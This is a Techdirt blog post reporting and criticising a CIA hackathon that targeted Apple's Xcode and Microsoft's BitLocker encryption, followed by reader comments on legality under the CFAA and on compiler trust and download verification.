CIA Holds Special Annual Hackathons Looking To Undermine Apple Encryption And Privacy

from the the-ijamboree dept

The latest big report from the Intercept is about an annual hackathon, put on by the CIA (which the NSA and others participate in) where they try to hack encrypted systems, with a key focus on Apple products. The CIA calls this its annual “Trusted Computing Base Jamboree.” The whole point: how can the CIA undermine trusted computing systems.

If you can’t see that, it notes:

As in past years, the Jamboree will be an informal and interactive conference with an emphasis on presentations that provide important information to developers trying to circumvent or exploit new security capabilities.

In other words, rather than seeking to better protect Americans by making sure the security products they use remain secure, this event was about making everyone less safe — in particular Apple users. The report notes how researchers have undermined Xcode so that the intelligence community can inject backdoors into lots of apps and to reveal private keys (apparently not caring how that makes everyone less secure):

A year later, at the 2012 Jamboree, researchers described their attacks on the software used by developers to create applications for Apple?s popular App Store. In a talk called ?Strawhorse: Attacking the MacOS and iOS Software Development Kit,? a presenter from Sandia Labs described a successful ?whacking? of Apple?s Xcode ? the software used to create apps for iPhones, iPads and Mac computers. Developers who create Apple-approved and distributed apps overwhelmingly use Xcode, a free piece of software easily downloaded from the App Store.

The researchers boasted that they had discovered a way to manipulate Xcode so that it could serve as a conduit for infecting and extracting private data from devices on which users had installed apps that were built with the poisoned Xcode. In other words, by manipulating Xcode, the spies could compromise the devices and private data of anyone with apps made by a poisoned developer ? potentially millions of people.

The risks for nearly anyone using an Apple product should become pretty clear when you realize what this “whacked” Xcode can do:

  • ?Entice? all Mac applications to create a ?remote backdoor? allowing undetected access to an Apple computer.
  • Secretly embed an app developer?s private key into all iOS applications. (This could potentially allow spies to impersonate the targeted developer.)
  • ?Force all iOS applications? to send data from an iPhone or iPad back to a U.S. intelligence ?listening post.?
  • Disable core security features on Apple devices.

While the Jamboree appears mostly focused on Apple products, that’s not all. Microsoft’s BitLocker encryption was also a target:

Also presented at the Jamboree were successes in the targeting of Microsoft?s disk encryption technology, and the TPM chips that are used to store its encryption keys. Researchers at the CIA conference in 2010 boasted about the ability to extract the encryption keys used by BitLocker and thus decrypt private data stored on the computer. Because the TPM chip is used to protect the system from untrusted software, attacking it could allow the covert installation of malware onto the computer, which could be used to access otherwise encrypted communications and files of consumers.

Again, this suggests a serious problem when you have the same government that’s supposed to “protect us” in charge of also hacking into systems. With today’s modern technology, the communications technologies that “bad people” use are the same ones that everyone uses. The intelligence community has two choices: protect everyone, or undermine the security of everyone. It has chosen the latter.

?The U.S. government is prioritizing its own offensive surveillance needs over the cybersecurity of the millions of Americans who use Apple products,? says Christopher Soghoian, the principal technologist at the American Civil Liberties Union. ?If U.S. government-funded researchers can discover these flaws, it is quite likely that Chinese, Russian and Israeli researchers can discover them, too. By quietly exploiting these flaws rather than notifying Apple, the U.S. government leaves Apple?s customers vulnerable to other sophisticated governments.?

There’s been a lot of talk lately about the growing divide between the intelligence community and Silicon Valley. As more stories come out of projects to undermine those companies and the trust they’ve built with the public, it’s only going to get worse.

Filed Under: , , , , , ,
Companies: apple

Rate this comment as insightful
Rate this comment as funny
You have rated this comment as insightful
You have rated this comment as funny
Flag this comment as abusive/trolling/spam
You have flagged this comment
The first word has already been claimed
The last word has already been claimed
Insightful Lightbulb icon Funny Laughing icon Abusive/trolling/spam Flag icon Insightful badge Lightbulb icon Funny badge Laughing icon Comments icon

Comments on “CIA Holds Special Annual Hackathons Looking To Undermine Apple Encryption And Privacy”

Subscribe: RSS Leave a comment
45 Comments
sigalrm (profile) says:

Re: Re:

“This seems like a pretty blatant and flagrant violation of the CFAA.”

Nope. Not illegal under the CFAA.

18 USC Section 1030 – Fraud and related activity in connection with computers (more commonly known as the Computer Fraud and Abuse Act)

Paragraph F has the Law Enforcement/Intelligence Community/Military carve out verbiage (from https://www.law.cornell.edu/uscode/text/18/1030)

(f) This section does not prohibit any lawfully authorized investigative, protective, or intelligence activity of a law enforcement agency of the United States, a State, or a political subdivision of a State, or of an intelligence agency of the United States.

This type of carve out is pretty much boilerplate.

Seegras (profile) says:

Re: Re:

Nope. It’s not the research that’s banned, it’s the launching of such an attack.

And actually, I think what they’re doing is nearly a good thing. Of course, subverting XCode helps no-one, but breaking TPM with side-channel attacks does. On one condition: Publication.

That said, without publication, the CIA is of course not helping to make anything more secure, but making everyone less secure, including the rest of the USA.

That One Guy (profile) says:

Not 'can', 'have'

“If U.S. government-funded researchers can discover these flaws, it is quite likely that Chinese, Russian and Israeli researchers can discover them, too.

The security flaws they are creating are valuable enough that the odds that not one person at the event can be, or has been bought off to ‘share’ them is so close to zero as to be indistinguishable. So basically the CIA is hosting an event, paid for by the US taxpayers, to undermine the security of otherwise secure devices, and sharing the results not only with other US agencies, but everyone else as well.

Yet another example making it crystal clear that US government agencies have absolutely no interest in protecting US security, but only care about destroying it and making their jobs just a little bit easier as a result.

sigalrm (profile) says:

And now for something completely different...

“The researchers boasted that they had discovered a way to manipulate Xcode so that it could serve as a conduit for infecting and extracting private data from devices on which users had installed apps that were built with the poisoned Xcode. In other words, by manipulating Xcode, the spies could compromise the devices and private data of anyone with apps made by a poisoned developer — potentially millions of people.”

So…some of the best CompSci minds in the US figured out that if you control the compiler, you can make code compiled with that compiler do what you what you want. And even better, if you put that compiler on the workstation of a developer who builds a popular product, you get a compromised binary installed on lots of systems.

Am I missing something? This attack vector is obvious, and frankly every compiler available, across every computing platform available, is “vulnerable” to this type of manipulation.

This goes all the way back to Ken Thompson’s ACM Turing Award Lecture “Reflections on trusting trust” – that he presented in August of 1984, if I’m not mistaken – and was fairly well known and understood back then.

Anonymous Coward says:

Re: And now for something completely different...

Am I missing something? This attack vector is obvious, and frankly every compiler available, across every computing platform available, is “vulnerable” to this type of manipulation.

Yes, you’re missing the fact that the CIA doesn’t care whether it’s novel, only that it works. Also that countermeasures like diverse double compiling and reproducible builds have only attracted interest very recently, and still aren’t widely used. There’s actually still software, even compilers, being released without source code.

Anonymous Coward says:

Re: And now for something completely different...

Am I missing something? This attack vector is obvious, and frankly every compiler available, across every computing platform available, is “vulnerable” to this type of manipulation.

I read it to be that they were looking for ways to cause a poisoned developer to obtain an evil Xcode when the developer thought he/she had downloaded a clean copy from Apple. Yes, getting a popular app built with a subverted compiler is obvious. The tricky part is subverting the compiler in a way that nobody notices it has been subverted.

sigalrm (profile) says:

Re: Re: And now for something completely different...

“The tricky part is subverting the compiler in a way that nobody notices it has been subverted”

How many developers actually validate their compilers? As far as I’m aware, very few people/organizations expend any effort on the compiler unless it’s producing obviously broken object code – particularly when the compiler is delivered pre-built, like XCode is.

When I see phrases like “developers were boasting” that they’d figured out how to manipulate a compiler, it makes it sound like they felt they’d hit on a fresh, new concept.

Anonymous Coward says:

Re: Re: Re: And now for something completely different...

The human who runs the download won’t spend much or any effort on validating the download, but if the download process itself does sanity checks (e.g. require a good TLS connection to a pinned certificate known to be used by Apple, or verify a signed checksum matches and was signed by a key used by Apple), then the process is not as trivial as replacing your typical webpage. Finding a way to insert subverted content that passes the downloader’s sanity checks is a likely goal, and would range from trivial (if the downloader is stupid or has no sanity checks) to really hard (if the downloader is cautious and malicious intruders have to attack the cryptographic primitives it uses to check the result).

Anonymous Coward says:

Re: Re: Re:2 And now for something completely different...

Good idea to have the install process perform a verification. However, if the web page has been replaced so as to point to a compromised compiler download, it seems to me that any verification that the compromised site does can also be compromised. So you would need to split the install and verification into separate sites and require someone installing the software to go to those separate sites. Frankly, I don’t think they would do that since most don’t even bother to verify that a SHA512 of the installation binary blob matches.

Anonymous Coward says:

Re: Re: Re:3 And now for something completely different...

So you would need to split the install and verification into separate sites and require someone installing the software to go to those separate sites.

Not proof against a man in the middle attack, as the connection to both sites can be redirected to a compromised site, especially if the attacker is a government agency. Key distribution, and securing the crypto system are the hardest problems to solve in designing a crypto system. Even public key systems are problematic in this area, as how do you know that the person giving you a public key is who they claim to be?

John Fenderson (profile) says:

Re: Re: Re: And now for something completely different...

” it makes it sound like they felt they’d hit on a fresh, new concept.”

They probably did. I don’t think I’ve seen a genuinely fresh, new concept in the computer space since the ’90s, but not a day goes by that an old concept is trotted out and everyone acts like it’s something new. The latest example would be “the cloud”. (In fairness, there may have been one or two genuinely new concepts that I just don’t remember right now, but still.)

I think this is a function of age and the woeful ignorance the newer crops of engineers have about the history of the field.

Anonymous Coward says:

Re: Re:

What the F is that “strong oversight Committee” doing over there??

I’m sure you’ve seen one of those cartoons or shows where the criminal takes a picture from the point of view of the security camera and then places it in front of the security camera so that it looks like everything is normal.
I imagine it’s much the same for the oversight committee. They haven’t figured out that it’s just a picture yet.

JP Jones (profile) says:

It cracks me up that using someone else’s password could be a violation of the CFAA, landing you years of prison time, but the CIA can hold “hack-a-thons” which encourage mass CFAA violations. Unless I missed a memo, government employees still have to obey the law. As a government employee, I’d really like to see that law, because right now I have to obey all of them and more (UCMJ).

“But it’s the CIA!” many of you may be thinking, “They’re supposed to be hacking stuff!” Not quite. Just like the military, most intelligence services have clear “rules of engagement” when it comes to using their tools. One of those ROEs is usually “target is foreign” in varying degrees of specificity. While it’s certainly possible they simply marked Apple as “foreign” somehow that seems more than a little bit of a stretch.

The weird part about all of this stuff is that it’s illegal to mark illegal actions as classified for the purpose of hiding those actions. That’s why the NSA made such a big deal about the FISA court making all their shenanigans “legal,” without that defense, they literally aren’t allowed to classify it (or do it, for that matter). This is strange because EO 13526 is the fundamental order that drives virtually all classification guidelines throughout the government, and it specifically states the following:

(a) In no case shall information be classified, continue to be maintained as classified, or fail to be declassified in order to:
(1) conceal violations of law, inefficiency, or administrative error;
(2) prevent embarrassment to a person, organization, or agency;
(3) restrain competition; or
(4) prevent or delay the release of information that does not require protection in the interest of the national security.
(emphasis mine)

Laws like the CFAA apply to organizations like the CIA; they don’t get a magical free pass because it’s their job, just like police don’t just get to shoot anyone or break into their houses because it’s their job (although it can sometimes be difficult to see). They need specific criteria to work around those laws.

I’m curious if a group of civilian hackers would be prosecuted for doing the same thing. If so, and the CIA hackers are not using their tools specifically on a foreign intelligence or otherwise suspected criminal element (which Apple is not), they are clearly breaking the law.

Just like the police, it’s amazing what people will do when they have enough lawyers to ignore their violations and they’ve convinced themselves they’re doing it “for our own good.”

Anonymous Coward says:

Re: Re:

“Unless I missed a memo, government employees still have to obey the law.”
In theory yes but who would enforce the law? I highly doubt that the police will raid the CIA. But that would mean someone has the guts to prosecute the CIA in the first place. Would you go after someone who knows everything about you and can place evidence on your or your friends computers (i.e. child pron or money trace to some terror group) which destroys your/their life?

“just like police don’t just get to shoot anyone or break into their houses because it’s their job (although it can sometimes be difficult to see).”
Recent events show that they can shoot anyone and say “I felt threatend”. Breaking into a house only requires someone to lie and say they heard a gunshot and/or someone is holding a person hostage (i.e. Twitch SWATing). How long till they catch on and that “someone” is a police officer from a payphone or something like that?

“I’m curious if a group of civilian hackers would be prosecuted for doing the same thing.”
There are other hackathons so technicly civilian hackers aren’t prosecuted at least as long as they disclose their find to the company.

JP Jones (profile) says:

Re: Re: Re:

While there are certainly abuses of the law that doesn’t make the action legal or unprosecutable. To use the example of another notorious group in the financial sector, stealing billions of dollars via insider trading and other methods is highly illegal, but few of the criminals involved in the scandals circa 2008 were even charged, let alone convicted, of their crimes. We should not accept lawbreaking simply because the people involved have power and money.

There are other hackathons so technicly civilian hackers aren’t prosecuted at least as long as they disclose their find to the company.

Sorry, this was a rhetorical question. The “hackathons” you’re talking about are programming expos; nothing that would constitute a computer crime happens there (at least, not without risking prosecution). While illegal hackathons certainly exist they can also be legally prosecuted. Likewise, disclosing your finds may not protect you from prosecution.

This all goes back to the horror of what Snowden revealed. It’s bad enough that it was happening. The real tragedy, however, is that it was all considered legal. You know there’s a problem when the American public is outraged over something that, for all practical purposes, broke no law. If that doesn’t reveal the size of the schism between what the people want and our government’s actions I don’t know what does.

sigalrm (profile) says:

Re: Re:

You missed the memo.

Most US Federal laws around this type of activity include explicit exceptions for LE/IC/Military organizations.

Easy way to check: Pull up the specific law in question in a browser, and search repeatedly for the word “intelligence”. When you get to the phrase “intelligence community”, you have arrived. That’s where the LE and Military exemptions will be as well.

sigalrm (profile) says:

Re: Re: Re:

since I can’t edit: Yes, IC/Military have their own set of legislation that they have to abide by, but acts like the CFAA specifically exempt them so long as the activity is “lawfully authorized”.

In this case, it’s safe to assume that CIA legal counsel has a set of orders stashed way which “authorizes” the activity for the purposes of compliance with the CFAA. And if they don’t, well, it’s fairly trivial (in practice) to generate such paperwork retroactively.

Fail says:

You have to admit this is a brilliant work around. Silicon Vally won’t give up encryption keys so we’ll just fight computer nerds with more computer nerds. It’s so obvious what their intentions are but there will still be those who will attend. Even if only one person shows up it’s still more than they got from big tech companies.

GEMont (profile) says:

Teaching the old dog new tricks.

I just watched about fifteen minutes of the new federally funded “CSI Cyber”, and let me tell you, its a must watch if you’re wondering in what direction the feds are gonna run the propaganda on this new “War On Cyber-Hackers” scam.

Disgruntled employee hacks roller-coaster ride, killing 1 – (then 2 more later from injuries) – and wounding many, by copying current employees cards using a fake card reader, and then using one of the stolen card-keys to open the control room where he inserts a perfect piece of code that spoofs the system’s accident prevention mechanisms into believing nothing is amiss while the cars roll off the rails.

One of the hackers is a caught criminal coerced into working for the fed in return for not going to prison for his cyber crimes.

Its a truly toss-your-cookies piece of public propaganda pablum.

—-

Leave a Reply to S7 Cancel reply

Your email address will not be published. Required fields are marked *

Have a Techdirt Account? Sign in now. Want one? Register here

Comment Options:

Make this the or (get credits or sign in to see balance) what's this?

What's this?

Techdirt community members with Techdirt Credits can spotlight a comment as either the "First Word" or "Last Word" on a particular comment thread. Credits can be purchased at the Techdirt Insider Shop »

Follow Techdirt

Techdirt Daily Newsletter

Ctrl-Alt-Speech

A weekly news podcast from
Mike Masnick & Ben Whitelaw

Subscribe now to Ctrl-Alt-Speech »
Techdirt Deals
Techdirt Insider Discord
The latest chatter on the Techdirt Insider Discord channel...
Loading...